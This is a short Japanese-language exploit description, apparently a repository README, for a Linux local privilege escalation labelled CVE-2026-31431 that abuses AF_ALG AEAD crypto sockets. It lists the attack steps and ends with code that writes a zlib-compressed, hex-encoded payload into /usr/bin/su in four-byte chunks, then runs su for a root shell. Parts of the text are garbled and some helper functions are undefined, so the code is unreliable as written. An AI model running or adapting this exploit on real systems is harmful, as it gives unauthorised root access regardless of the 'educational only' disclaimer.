
CVE-2026-31431 のローカル権限昇格エクスプロイト。AF_ALG AEAD ソケット処理を悪用し、脆弱な Linux カーネル上で root シェルアクセスを達成します。
CVE-2026-31431は、AF_ALG(カーネル暗号API) インターフェースを悪用するLinuxの権限昇格の脆弱性です。AEAD(Associated Data付き認証暗号)ソケットとの悪意のある相互作用を細工することで、攻撃者は権限を昇格させ、rootとしてコードを実行できます。
この脆弱性は、暗号ソケット操作の不適切な処理を悪用し、制御されたメモリ操作と最終的な権限昇格を可能にします。
/usr/bin/su)このエクスプロイトは:
AF_ALGソケット を作成
以下にバインド:
authenc(hmac(sha256),cbc(aes))
setsockopt と sendmsg を介して細工されたペイロードを使用
意図しないカーネル動作をトリガー
以下を介してrootシェルに移行:
g.system("su")
主な指標:
socket(38,5,0) の使用 → AF_ALGzlib)による制御されたメモリ書き込み
**免責事項:このPoCは私の所有物ではありません。許可が得られた環境でのテストを目的とした教育用のみです。著者/所有者は誤用について一切責任を負いません。 **
f=g.open("/usr/bin/su",0)
i=0
e=zlib.decompress(d("78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"))
while i<len(e):
c(f,i,e[i:i+4])
i+=4
g.system("su")